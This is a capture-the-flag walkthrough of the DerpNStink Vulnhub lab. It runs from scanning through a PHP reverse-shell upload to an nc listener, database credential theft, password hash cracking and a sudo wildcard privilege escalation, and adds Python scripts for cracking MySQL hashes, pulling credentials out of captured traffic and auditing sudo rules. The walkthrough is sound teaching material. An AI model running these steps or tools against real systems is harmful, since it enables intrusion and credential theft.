DerpNStink

DerpNStink Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/DNS 192.168.1.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 04:37 EDT
Nmap scan report for 192.168.1.116
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:7D:91:B5 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds

Let's open the IP in a web browser.

Opening the page source (Inspect Element) and expanding all of the div elements reveals the first flag hidden in an HTML comment-like block of the page.

Dirb

dirb http://192.168.1.116/
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 25 04:50:28 2020
URL_BASE: http://192.168.1.116/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.116/ ----
==> DIRECTORY: http://192.168.1.116/css/                                                                                              
+ http://192.168.1.116/index.html (CODE:200|SIZE:1298)                                                                                
==> DIRECTORY: http://192.168.1.116/javascript/                                                                                       
==> DIRECTORY: http://192.168.1.116/js/                                                                                               
==> DIRECTORY: http://192.168.1.116/php/                                                                                              
+ http://192.168.1.116/robots.txt (CODE:200|SIZE:53)                                                                                  
+ http://192.168.1.116/server-status (CODE:403|SIZE:293)                                                                              
==> DIRECTORY: http://192.168.1.116/temporary/                                                                                        
==> DIRECTORY: http://192.168.1.116/weblog/   

Both the nmap and dirb output list a robots.txt, so let's look at it.

It disallows /php/ and /temporary/. We don't have permission to view /php/, and /temporary/ just tells us to try harder.

The dirb scan also found /weblog/. Navigating there gave an error: the blog is served under the hostname derpnstink.local, which our machine can't resolve.

So I added an entry to /etc/hosts mapping 192.168.1.116 to derpnstink.local.

After refreshing the page we see a WordPress blog.

Wpscan

wpscan --url http://derpnstink.local/weblog/ --enumerate u,ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://derpnstink.local/weblog/ [192.168.1.116]
[+] Started: Mon May 25 04:55:03 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.7 (Ubuntu)
 |  - X-Powered-By: PHP/5.5.9-1ubuntu4.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://derpnstink.local/weblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://derpnstink.local/weblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://derpnstink.local/weblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.6.18 identified (Latest, released on 2020-04-29).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: '-release.min.js?ver=4.6.18'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.18'

[+] WordPress theme in use: twentysixteen
 | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:02:19 <===================================================> (86907 / 86907) 100.00% Time: 00:02:19
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://derpnstink.local/weblog/wp-content/plugins/akismet/
 | Last Updated: 2020-04-29T13:02:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 4.1.5
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/, status: 200
 |
 | Version: 3.1.11 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt

[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2019-07-12T13:09:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | [!] The version is out of date, the latest version is 1.6.12
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/, status: 403
 |
 | Version: 1.4.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] unclestinky
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon May 25 04:57:36 2020
[+] Requests Done: 86966
[+] Cached Requests: 12
[+] Data Sent: 22.571 MB
[+] Data Received: 11.789 MB
[+] Memory used: 368.992 MB
[+] Elapsed time: 00:02:33

That gives us 2 plugins (akismet 3.1.11 and slideshow-gallery 1.4.6, both out of date) and 2 usernames (unclestinky and admin). On the first try I managed to log in to wp-admin with the username admin and password admin.

After clicking around, I found that under Manage Slides we can edit a slideshow, and at the bottom of the edit form there is an image upload. An upload form in an outdated plugin is a promising place to get code execution, so I decided to upload a PHP shell in place of an image.

Exploitation

Reverse Shell

Download the PHP reverse shell (php-reverse-shell.php) from pentestmonkey.

Change the $ip and $port variables in the script to our machine's IP and a port of our choosing, then set up a listener on that port:

nc -nlvp 4444

Then go to Manage Slides.

Click the slide (randonx) to edit it.

Scroll to the bottom of the edit form to the image upload.

Upload the reverse shell file there instead of an image.

Then go back to /weblog.

Click the right arrow on the slideshow until the uploaded file is loaded; the server executes it as PHP and we get a callback on our listener.

Once the shell lands, upgrade it to an interactive TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Running linpeas.sh turned up a MySQL username and password.

We can use them to log in to phpMyAdmin at /php/phpmyadmin.

Open the wordpress database and look at the wp_users table.

The hashes there are WordPress phpass hashes (salted and iterated), so cracking unclestinky's would take a while. To make it easy, I copied admin's hash, whose password we already know is admin, over unclestinky's user_pass. Because the salt is embedded in the hash string itself, the copied value validates for the password admin no matter which user row it sits in.

Then we can log in to WordPress again, this time as unclestinky with the password admin.

Go to the posts and we find the second flag.

Back in phpMyAdmin, open the mysql database and go to the user table.

Take unclestinky's password hash from there and run it through a hash cracker.

It cracks to wedgie57.

The same password lets us SSH in as the local user stinky.
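The hash in mysql.user on a MySQL 5.5 server is in the mysql_native_password format: a '*' followed by the upper-case hex of SHA1(SHA1(password)), with no salt, so a wordlist attack is cheap. As an added example that is not from the walkthrough, here is a small Python cracker that recognises that format and tries every wordlist entry plainly, capitalised, and with one- or two-digit suffixes, the kind of rule that turns wedgie into wedgie57. The sample rows are constructed and their hashes computed inside the script; the second user's password is made up.

```python
import hashlib
import itertools
import string


def mysql_native_hash(password):
    """mysql_native_password: '*' + upper-case hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode('utf-8')).digest()
    return '*' + hashlib.sha1(inner).hexdigest().upper()


def is_mysql_native_hash(value):
    return (len(value) == 41 and value[0] == '*'
            and all(c in string.hexdigits for c in value[1:]))


def candidates(words, max_suffix_digits=2):
    """Yield each base word plainly, capitalised, and with every 1..N digit suffix."""
    for word in words:
        word = word.strip()
        if not word:
            continue
        for base in dict.fromkeys((word, word.capitalize())):   # de-dup if already capitalised
            yield base
            for n in range(1, max_suffix_digits + 1):
                for digits in itertools.product('0123456789', repeat=n):
                    yield base + ''.join(digits)


def crack_mysql_native(target, words, max_suffix_digits=2):
    """Return the candidate whose mysql_native hash equals target, or None."""
    if not is_mysql_native_hash(target):
        raise ValueError('not a mysql_native_password hash: %r' % target)
    target = target.upper()
    for cand in candidates(words, max_suffix_digits):
        if mysql_native_hash(cand) == target:
            return cand
    return None


def crack_table(rows, words):
    """Crack every row of a {user: hash} dump; None where nothing matched."""
    return {user: crack_mysql_native(h, words) for user, h in rows.items()}


# Constructed sample: one hash for the password the walkthrough recovers, one
# for a password deliberately absent from the wordlist. Computed here, not
# copied from the box's mysql.user table.
SAMPLE_MYSQL_USERS = {
    'unclestinky': mysql_native_hash('wedgie57'),
    'otheruser': mysql_native_hash('not-in-any-wordlist-9Qx'),
}
SAMPLE_WORDLIST = ['admin', 'password', 'derp', 'stinky', 'wedgie']


if __name__ == '__main__':
    for user, pw in crack_table(SAMPLE_MYSQL_USERS, SAMPLE_WORDLIST).items():
        print(user, pw or '(not cracked)')
```

For a real wordlist, pass an open file object as words; hashcat mode 300 does the same job far faster, but the script shows exactly what the hash is and why no salt means one SHA1 pair per guess.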

In stinky's Desktop folder I found the third flag!

Looking around /home, I found an ftp directory.

Inside it is a chain of directories nested one inside the other.

Seven cd's deep there is a key.txt.

It contains an RSA private key.

This is probably a clue for SSH access as the user stinky.

Save the key to a file called id_rsa in /root/.ssh on our machine.

SSH refuses a private key whose file is readable by others ("permissions are too open"), so we need to tighten them:

chmod 700 id_rsa

(600 is the conventional mode for a key file; either works, since ssh only requires that group and others have no access.)

Then we can SSH in with the key:

ssh -i /root/.ssh/id_rsa stinky@192.168.1.116

Then navigate to /home/stinky/Documents, where there is a pcap file.

Transfer it to our machine with nc.

Then analyse it in Wireshark.

Following the TCP streams, one of them carries the password for the user mrderp in cleartext.

We then su to mrderp.

Then run sudo -l; it shows that mrderp may run /home/mrderp/binaries/derpy* as root.
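Wireshark's Follow TCP Stream is the right tool interactively, but the same check can be scripted so it works on every capture you pull off a box. The following is an added example, not from the walkthrough: a standard-library-only Python parser that reads a classic libpcap file (Ethernet/IPv4/TCP), reassembles each direction of each TCP conversation by sequence number, and pulls credential-looking fields out of HTTP POST form bodies, which is what a WordPress login looks like on the wire. It assumes plain HTTP on the captured link, as on this box, and does not handle pcapng or IP fragmentation. The embedded capture is constructed inside the script with made-up credentials; it is not the pcap from stinky's Documents.

```python
import struct
from collections import defaultdict
from urllib.parse import parse_qs

CRED_FIELDS = {'log', 'pwd', 'user', 'username', 'pass', 'password', 'passwd'}


def reassemble_tcp_streams(pcap):
    """{(src, sport, dst, dport): bytes} for a classic libpcap file carrying
    Ethernet/IPv4/TCP. Segments are ordered by sequence number and exact
    retransmissions dropped; IP fragments and pcapng are not handled."""
    magic = pcap[:4]
    if magic == b'\xd4\xc3\xb2\xa1':
        endian = '<'
    elif magic == b'\xa1\xb2\xc3\xd4':
        endian = '>'
    else:
        raise ValueError('not a classic pcap file')
    segments = defaultdict(dict)                   # stream -> {seq: payload}
    off = 24                                       # skip the global header
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + 'IIII', pcap[off:off + 16])
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or frame[12:14] != b'\x08\x00':
            continue                               # not IPv4 over Ethernet
        ip = frame[14:]
        if ip[9] != 6:
            continue                               # not TCP
        ihl = (ip[0] & 0x0f) * 4
        total_len = struct.unpack('!H', ip[2:4])[0]
        src = '.'.join(map(str, ip[12:16]))
        dst = '.'.join(map(str, ip[16:20]))
        tcp = ip[ihl:total_len]
        sport, dport, seq = struct.unpack('!HHI', tcp[:8])
        payload = tcp[(tcp[12] >> 4) * 4:]         # data offset is the top nibble of byte 12
        if payload:
            segments[(src, sport, dst, dport)].setdefault(seq, payload)
    return {key: b''.join(p for _, p in sorted(segs.items()))
            for key, segs in segments.items()}


def find_form_credentials(streams):
    """Scripted 'Follow TCP Stream': for every HTTP POST with a form body,
    return the credential-looking fields."""
    hits = []
    for (src, sport, dst, dport), data in streams.items():
        pos = 0
        while (start := data.find(b'POST ', pos)) >= 0:
            hdr_end = data.find(b'\r\n\r\n', start)
            if hdr_end < 0:
                break
            lines = data[start:hdr_end].decode('latin-1').split('\r\n')
            clen = 0
            for line in lines[1:]:
                name, _, val = line.partition(':')
                if name.strip().lower() == 'content-length':
                    clen = int(val)
            body = data[hdr_end + 4:hdr_end + 4 + clen].decode('latin-1')
            fields = {k: v[0] for k, v in parse_qs(body).items() if k.lower() in CRED_FIELDS}
            if fields:
                hits.append({'from': f'{src}:{sport}', 'to': f'{dst}:{dport}',
                             'path': lines[0].split(' ')[1], 'fields': fields})
            pos = hdr_end + 4 + clen
    return hits


def extract_credentials(pcap):
    return find_form_credentials(reassemble_tcp_streams(pcap))


def _frame(src, sport, dst, dport, seq, payload):
    """Minimal Ethernet/IPv4/TCP frame; checksums are left zero, which the parser ignores."""
    tcp = struct.pack('!HHIIBBHHH', sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(map(int, src.split('.'))), bytes(map(int, dst.split('.')))) + tcp
    return bytes(12) + b'\x08\x00' + ip


def build_sample_pcap():
    """Constructed capture: a WordPress login POST split across two segments that
    are written out of order, plus the server's reply. The credentials are made
    up; this is not the pcap from stinky's Documents."""
    body = b'log=someuser&pwd=made-up-pass-123&wp-submit=Log+In'
    head = (b'POST /weblog/wp-login.php HTTP/1.1\r\nHost: derpnstink.local\r\n'
            b'Content-Type: application/x-www-form-urlencoded\r\n'
            b'Content-Length: %d\r\n\r\n' % len(body))
    client, server = '192.168.1.10', '192.168.1.116'
    frames = [_frame(client, 52000, server, 80, 1000 + len(head), body),
              _frame(client, 52000, server, 80, 1000, head),
              _frame(server, 80, client, 52000, 5000, b'HTTP/1.1 302 Found\r\nContent-Length: 0\r\n\r\n')]
    out = struct.pack('<IHHiIII', 0xa1b2c3d4, 2, 4, 0, 0, 65535, 1)   # link type 1 = Ethernet
    for i, f in enumerate(frames):
        out += struct.pack('<IIII', 1590000000 + i, 0, len(f), len(f)) + f
    return out


if __name__ == '__main__':
    for hit in extract_credentials(build_sample_pcap()):
        print(hit)
```

To run it on the real file, replace build_sample_pcap() with open('capture.pcap', 'rb').read(); if Wireshark saved it as pcapng, export it as classic pcap first.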

Privilege Escalation

The sudo rule points at /home/mrderp/binaries/derpy*, but there is no binaries directory in /home/mrderp. Since mrderp owns the home directory, we can create it and drop in any executable whose name matches the wildcard:

mkdir binaries
cd binaries
printf '#!/bin/bash\n/bin/bash\n' > derpy.sh
chmod +x derpy.sh
sudo /home/mrderp/binaries/derpy.sh

Got root !
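The general lesson is that a sudo rule whose command path contains a wildcard, or whose directory the user can create or write to, is equivalent to root. As an added example, not from the walkthrough, this Python script parses sudo -l output and flags such rules. The sample output is constructed to match this box's rule as inferred from the commands above (the walkthrough does not print the real sudo -l output), and the filesystem checks can be swapped for fakes so the logic can be tested without mrderp's home directory.

```python
import os
import re

# Constructed "sudo -l" output modelled on this box. The walkthrough does not
# quote the real output; the rule path is inferred from the commands it runs.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mrderp on derpnstink:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mrderp may run the following commands on derpnstink:
    (ALL) /home/mrderp/binaries/derpy*
    (root) NOPASSWD: /bin/cat /var/log/syslog
"""

# A rule line looks like "    (runas) [TAG: ...] /path/to/cmd [args]"
RULE_RE = re.compile(r'^\s*\([^)]*\)\s*(?:[A-Z_]+:\s*)*(\S+)')


def sudo_commands(sudo_l_output):
    """Return the command word of every rule line in 'sudo -l' output."""
    return [m.group(1) for m in map(RULE_RE.match, sudo_l_output.splitlines()) if m]


def assess_rule(cmd, isdir=os.path.isdir, exists=os.path.exists,
                writable=lambda p: os.access(p, os.W_OK)):
    """Findings for one command path. The filesystem predicates are injectable
    so the logic can be exercised against a pretend filesystem."""
    if cmd == 'ALL':
        return ['ALL: unrestricted, just run sudo su']
    findings = []
    if any(c in cmd for c in '*?['):
        findings.append('wildcard: sudoers matches the path with fnmatch, so any file '
                        'you can create under a matching name runs as the runas user')
    parent = os.path.dirname(cmd)
    if not isdir(parent):
        findings.append(f'missing directory {parent}: if you can mkdir it, you choose the target')
    elif writable(parent):
        findings.append(f'writable directory {parent}: you can create or replace the target')
    elif exists(cmd) and writable(cmd):
        findings.append(f'writable target {cmd}: you can change what runs')
    return findings


def audit(sudo_l_output, **fs):
    """Map each sudo-able command to its findings (empty list = nothing obvious)."""
    return {cmd: assess_rule(cmd, **fs) for cmd in sudo_commands(sudo_l_output)}


if __name__ == '__main__':
    import subprocess
    try:
        out = subprocess.run(['sudo', '-n', '-l'], capture_output=True, text=True).stdout
    except OSError:
        out = ''
    for cmd, findings in audit(out or SAMPLE_SUDO_L).items():
        print(cmd, findings or ['ok'])
```

Run it as the user you have a shell as; on this box the derpy* entry is flagged twice, once for the wildcard and once for the directory that does not exist yet, which is exactly the pair of weaknesses the mkdir above exploits.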

Navigate to the /root/Desktop to get the fourth flag
